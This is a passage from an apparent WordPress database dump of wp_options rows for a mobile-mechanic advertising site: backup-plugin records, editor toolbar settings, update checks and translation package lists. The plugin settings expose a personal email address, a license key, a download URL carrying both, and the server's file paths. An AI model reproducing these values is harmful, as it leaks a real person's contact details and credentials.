";a:0:{}s:9:\"OmitFiles\";a:0:{}s:10:\"\0*\0Package\";O:11:\"DUP_Package\":16:{s:2:\"ID\";N;s:4:\"Name\";s:37:\"20150203_mobilemechanicstallahasseefl\";s:4:\"Hash\";s:29:\"54d78ac05c5471857150208161144\";s:8:\"NameHash\";s:67:\"20150203_mobilemechanicstallahasseefl_54d78ac05c5471857150208161144\";s:7:\"Version\";s:6:\"0.5.12\";s:4:\"Type\";i:0;s:5:\"Notes\";s:0:\"\";s:9:\"StorePath\";s:51:\"/home/themobilemech207/public_html/wp-snapshots/tmp\";s:8:\"StoreURL\";s:55:\"http://tallahassee.themobilemechanics.org/wp-snapshots/\";s:8:\"ScanFile\";N;s:7:\"Runtime\";N;s:7:\"ExeSize\";N;s:7:\"ZipSize\";N;s:7:\"Archive\";r:15;s:9:\"Installer\";O:13:\"DUP_Installer\":11:{s:4:\"File\";N;s:4:\"Size\";i:0;s:10:\"OptsDBHost\";s:0:\"\";s:10:\"OptsDBName\";s:0:\"\";s:10:\"OptsDBUser\";s:0:\"\";s:12:\"OptsSSLAdmin\";i:0;s:12:\"OptsSSLLogin\";i:0;s:11:\"OptsCacheWP\";i:0;s:13:\"OptsCachePath\";i:0;s:10:\"OptsURLNew\";s:0:\"\";s:10:\"\0*\0Package\";r:30;}s:8:\"Database\";O:12:\"DUP_Database\":11:{s:4:\"Type\";s:5:\"MySQL\";s:4:\"Size\";N;s:4:\"File\";N;s:4:\"Path\";N;s:12:\"FilterTables\";s:0:\"\";s:8:\"FilterOn\";i:0;s:4:\"Name\";N;s:10:\"\0*\0Package\";r:30;s:25:\"\0DUP_Database\0dbStorePath\";N;s:23:\"\0DUP_Database\0EOFMarker\";s:0:\"\";s:26:\"\0DUP_Database\0networkFlush\";b:0;}}s:28:\"\0DUP_Archive\0filterDirsArray\";a:0:{}s:28:\"\0DUP_Archive\0filterExtsArray\";a:0:{}}s:9:\"Installer\";r:45;s:8:\"Database\";r:57;}", "yes");
INSERT INTO `wp_options` VALUES("266", "_site_transient_update_themes", "O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1423392866;s:7:\"checked\";a:5:{s:22:\"RockStarLeadTheme-v2-4\";s:3:\"2.4\";s:13:\"twentyfifteen\";s:3:\"1.0\";s:14:\"twentyfourteen\";s:3:\"1.3\";s:14:\"twentythirteen\";s:3:\"1.4\";s:12:\"twentytwelve\";s:3:\"1.6\";}s:8:\"response\";a:0:{}s:12:\"translations\";a:0:{}}", "yes");
INSERT INTO `wp_options` VALUES("289", "jwl_options_group3", "a:1:{s:26:\"jwl_tinycolor_css_field_id\";a:1:{s:9:\"tinycolor\";s:7:\"Default\";}}", "yes");
INSERT INTO `wp_options` VALUES("290", "jwl_options_group4", "a:2:{s:17:\"jwl_menu_location\";s:4:\"Main\";s:21:\"jwl_tinymce_user_role\";s:13:\"Administrator\";}", "yes");
INSERT INTO `wp_options` VALUES("292", "jwl_options_group1", "a:56:{s:23:\"jwl_fontselect_field_id\";s:1:\"1\";s:23:\"jwl_fontselect_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:27:\"jwl_fontsizeselect_field_id\";s:1:\"1\";s:27:\"jwl_fontsizeselect_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:16:\"jwl_cut_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:17:\"jwl_copy_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:18:\"jwl_paste_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:28:\"jwl_backcolorpicker_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:28:\"jwl_forecolorpicker_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:18:\"jwl_advhr_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:22:\"jwl_visualaid_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:19:\"jwl_anchor_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:16:\"jwl_sub_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:16:\"jwl_sup_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:19:\"jwl_search_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:20:\"jwl_replace_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:21:\"jwl_datetime_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:24:\"jwl_nonbreaking_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:19:\"jwl_mailto_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:19:\"jwl_layers_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:17:\"jwl_span_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:21:\"jwl_equation_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:19:\"jwl_encode_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:27:\"jwl_directionality_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:20:\"jwl_ezimage_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:18:\"jwl_ptags_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:25:\"jwl_mcelinebreak_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:24:\"jwl_styleselect_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:26:\"jwl_tableDropdown_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:21:\"jwl_emotions_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:18:\"jwl_image_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:20:\"jwl_preview_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:17:\"jwl_cite_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:17:\"jwl_abbr_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:20:\"jwl_acronym_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:16:\"jwl_del_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:16:\"jwl_ins_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:20:\"jwl_attribs_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:23:\"jwl_styleprops_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:17:\"jwl_code_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:22:\"jwl_codemagic_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:18:\"jwl_html5_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:18:\"jwl_media_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:20:\"jwl_youtube_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:26:\"jwl_youtubeIframe_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:19:\"jwl_imgmap_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:24:\"jwl_visualchars_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:18:\"jwl_print_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:23:\"jwl_shortcodes_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:23:\"jwl_loremipsum_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:24:\"jwl_w3cvalidate_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:18:\"jwl_clker_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:19:\"jwl_acheck_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:20:\"jwl_advlink_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:16:\"jwl_div_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}s:21:\"jwl_nextpage_dropdown\";a:1:{s:3:\"row\";s:5:\"Row 1\";}}", "yes");
INSERT INTO `wp_options` VALUES("298", "category_children", "a:0:{}", "yes");
INSERT INTO `wp_options` VALUES("311", "papertemplate_hide", "a:5:{i:55;b:1;i:56;b:1;i:57;b:1;i:58;b:1;i:59;b:1;}", "yes");
INSERT INTO `wp_options` VALUES("312", "papertemplate", "a:20:{s:5:\"email\";s:17:\"keifersfl@aol.com\";s:3:\"key\";s:32:\"769decb7388691e0bc4b4d3aaad21781\";s:8:\"lasthash\";s:32:\"7109d909725518d92cffef04db0ea78a\";s:11:\"lastversion\";s:7:\"2.6.0.2\";s:9:\"lastcheck\";i:1423343122;s:16:\"lastversioncheck\";i:1423343122;s:8:\"realname\";s:0:\"\";s:12:\"businessname\";s:45:\"TheMobileMechanics.org (an advertising agent)\";s:12:\"contactemail\";s:30:\"support@themobilemechanics.org\";s:7:\"address\";s:0:\"\";s:5:\"phone\";s:0:\"\";s:7:\"country\";s:1:\"0\";s:7:\"support\";s:0:\"\";s:9:\"affiliate\";s:0:\"\";s:7:\"members\";s:0:\"\";s:4:\"menu\";s:5:\"legal\";s:5:\"front\";i:0;s:3:\"css\";s:0:\"\";s:6:\"footer\";s:0:\"\";s:6:\"header\";s:0:\"\";}", "yes");
INSERT INTO `wp_options` VALUES("314", "external_updates-papertemplate", "O:8:\"stdClass\":3:{s:9:\"lastCheck\";i:1423331086;s:14:\"checkedVersion\";s:5:\"2.1.0\";s:6:\"update\";O:12:\"PluginUpdate\":6:{s:2:\"id\";i:0;s:4:\"slug\";s:13:\"papertemplate\";s:7:\"version\";s:7:\"2.6.0.2\";s:8:\"homepage\";N;s:12:\"download_url\";s:128:\"http://www.incomemachine.com/members/?wpdrip=keifersfl%40aol.com%7C769decb7388691e0bc4b4d3aaad21781%7Cdefault%7C&action=download\";s:14:\"upgrade_notice\";N;}}", "yes");
INSERT INTO `wp_options` VALUES("329", "_site_transient_timeout_available_translations", "1423002168", "yes");
INSERT INTO `wp_options` VALUES("330", "_site_transient_available_translations", "a:46:{s:2:\"ar\";a:8:{s:8:\"language\";s:2:\"ar\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-17 19:01:24\";s:12:\"english_name\";s:6:\"Arabic\";s:11:\"native_name\";s:14:\"العربية\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/ar.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ar\";i:2;s:3:\"ara\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"المتابعة\";}}s:2:\"az\";a:8:{s:8:\"language\";s:2:\"az\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-27 15:23:28\";s:12:\"english_name\";s:11:\"Azerbaijani\";s:11:\"native_name\";s:16:\"Azərbaycan dili\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/az.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"az\";i:2;s:3:\"aze\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Davam\";}}s:5:\"bg_BG\";a:8:{s:8:\"language\";s:5:\"bg_BG\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-17 19:05:14\";s:12:\"english_name\";s:9:\"Bulgarian\";s:11:\"native_name\";s:18:\"Български\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/bg_BG.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bg\";i:2;s:3:\"bul\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:22:\"Продължение\";}}s:5:\"bs_BA\";a:8:{s:8:\"language\";s:5:\"bs_BA\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-08 17:39:56\";s:12:\"english_name\";s:7:\"Bosnian\";s:11:\"native_name\";s:8:\"Bosanski\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/bs_BA.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bs\";i:2;s:3:\"bos\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:2:\"ca\";a:8:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-19 03:45:15\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/ca.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ca\";i:2;s:3:\"cat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:2:\"cy\";a:8:{s:8:\"language\";s:2:\"cy\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-09 11:12:57\";s:12:\"english_name\";s:5:\"Welsh\";s:11:\"native_name\";s:7:\"Cymraeg\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/cy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"cy\";i:2;s:3:\"cym\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Parhau\";}}s:5:\"da_DK\";a:8:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-29 08:44:51\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/da_DK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"da\";i:2;s:3:\"dan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Forts&#230;t\";}}s:5:\"de_DE\";a:8:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-17 17:55:09\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/de_DE.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Fortfahren\";}}s:2:\"el\";a:8:{s:8:\"language\";s:2:\"el\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-29 22:16:49\";s:12:\"english_name\";s:5:\"Greek\";s:11:\"native_name\";s:16:\"Ελληνικά\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/el.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"el\";i:2;s:3:\"ell\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"Συνέχεια\";}}s:5:\"en_GB\";a:8:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-17 20:53:36\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/en_GB.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_AU\";a:8:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-19 07:48:52\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/en_AU.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_CA\";a:8:{s:8:\"language\";s:5:\"en_CA\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-28 01:01:02\";s:12:\"english_name\";s:16:\"English (Canada)\";s:11:\"native_name\";s:16:\"English (Canada)\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/en_CA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"eo\";a:8:{s:8:\"language\";s:2:\"eo\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-08 22:46:58\";s:12:\"english_name\";s:9:\"Esperanto\";s:11:\"native_name\";s:9:\"Esperanto\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/eo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eo\";i:2;s:3:\"epo\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Daŭrigi\";}}s:5:\"es_PE\";a:8:{s:8:\"language\";s:5:\"es_PE\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2014-12-19 08:14:32\";s:12:\"english_name\";s:14:\"Spanish (Peru)\";s:11:\"native_name\";s:17:\"Español de Perú\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/es_PE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_MX\";a:8:{s:8:\"language\";s:5:\"es_MX\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-08 23:41:34\";s:12:\"english_name\";s:16:\"Spanish (Mexico)\";s:11:\"native_name\";s:19:\"Español de México\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/es_MX.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_ES\";a:8:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-17 21:05:39\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/es_ES.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"es\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CL\";a:8:{s:8:\"language\";s:5:\"es_CL\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:19:\"2014-09-04 19:47:01\";s:12:\"english_name\";s:15:\"Spanish (Chile)\";s:11:\"native_name\";s:17:\"Español de Chile\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.0/es_CL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:2:\"eu\";a:8:{s:8:\"language\";s:2:\"eu\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-09 12:20:08\";s:12:\"english_name\";s:6:\"Basque\";s:11:\"native_name\";s:7:\"Euskara\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/eu.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eu\";i:2;s:3:\"eus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Jarraitu\";}}s:5:\"fa_IR\";a:8:{s:8:\"language\";s:5:\"fa_IR\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-23 14:29:09\";s:12:\"english_name\";s:7:\"Persian\";s:11:\"native_name\";s:10:\"فارسی\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/fa_IR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fa\";i:2;s:3:\"fas\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:2:\"fi\";a:8:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2014-12-17 07:01:16\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/fi.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fi\";i:2;s:3:\"fin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Jatka\";}}s:5:\"fr_FR\";a:8:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-17 19:01:48\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/fr_FR.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"fr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:2:\"gd\";a:8:{s:8:\"language\";s:2:\"gd\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:19:\"2014-09-05 17:37:43\";s:12:\"english_name\";s:15:\"Scottish Gaelic\";s:11:\"native_name\";s:9:\"Gàidhlig\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.0/gd.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"gd\";i:2;s:3:\"gla\";i:3;s:3:\"gla\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"Lean air adhart\";}}s:5:\"gl_ES\";a:8:{s:8:\"language\";s:5:\"gl_ES\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-17 18:37:43\";s:12:\"english_name\";s:8:\"Galician\";s:11:\"native_name\";s:6:\"Galego\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/gl_ES.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"gl\";i:2;s:3:\"glg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"he_IL\";a:8:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-29 14:11:31\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/he_IL.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"he\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"להמשיך\";}}s:2:\"hr\";a:8:{s:8:\"language\";s:2:\"hr\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2014-12-19 14:39:57\";s:12:\"english_name\";s:8:\"Croatian\";s:11:\"native_name\";s:8:\"Hrvatski\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/hr.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hr\";i:2;s:3:\"hrv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:5:\"hu_HU\";a:8:{s:8:\"language\";s:5:\"hu_HU\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-07 11:10:15\";s:12:\"english_name\";s:9:\"Hungarian\";s:11:\"native_name\";s:6:\"Magyar\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/hu_HU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hu\";i:2;s:3:\"hun\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Tovább\";}}s:5:\"id_ID\";a:8:{s:8:\"language\";s:5:\"id_ID\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-31 07:30:24\";s:12:\"english_name\";s:10:\"Indonesian\";s:11:\"native_name\";s:16:\"Bahasa Indonesia\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/id_ID.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"id\";i:2;s:3:\"ind\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Lanjutkan\";}}s:5:\"it_IT\";a:8:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-31 10:31:17\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/it_IT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"it\";i:2;s:3:\"ita\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:2:\"ja\";a:8:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-29 10:53:40\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/ja.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"ja\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"続ける\";}}s:5:\"ko_KR\";a:8:{s:8:\"language\";s:5:\"ko_KR\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-21 03:05:42\";s:12:\"english_name\";s:6:\"Korean\";s:11:\"native_name\";s:9:\"한국어\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/ko_KR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ko\";i:2;s:3:\"kor\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"계속\";}}s:5:\"my_MM\";a:8:{s:8:\"language\";s:5:\"my_MM\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2014-12-21 19:07:31\";s:12:\"english_name\";s:7:\"Burmese\";s:11:\"native_name\";s:15:\"ဗမာစာ\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/my_MM.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"my\";i:2;s:3:\"mya\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:54:\"ဆက်လက်လုပ်ေဆာင်ပါ။\";}}s:5:\"nb_NO\";a:8:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-10 16:35:13\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/nb_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nb\";i:2;s:3:\"nob\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Fortsett\";}}s:5:\"nl_NL\";a:8:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-23 08:38:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/nl_NL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"pl_PL\";a:8:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-02-01 05:11:03\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/pl_PL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pl\";i:2;s:3:\"pol\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Kontynuuj\";}}s:5:\"pt_PT\";a:8:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-02-02 11:59:53\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/pt_PT.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"pt_BR\";a:8:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-21 11:05:23\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/pt_BR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pt\";i:2;s:3:\"por\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"ro_RO\";a:8:{s:8:\"language\";s:5:\"ro_RO\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-16 10:34:32\";s:12:\"english_name\";s:8:\"Romanian\";s:11:\"native_name\";s:8:\"Română\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/ro_RO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ro\";i:2;s:3:\"ron\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuă\";}}s:5:\"ru_RU\";a:8:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-17 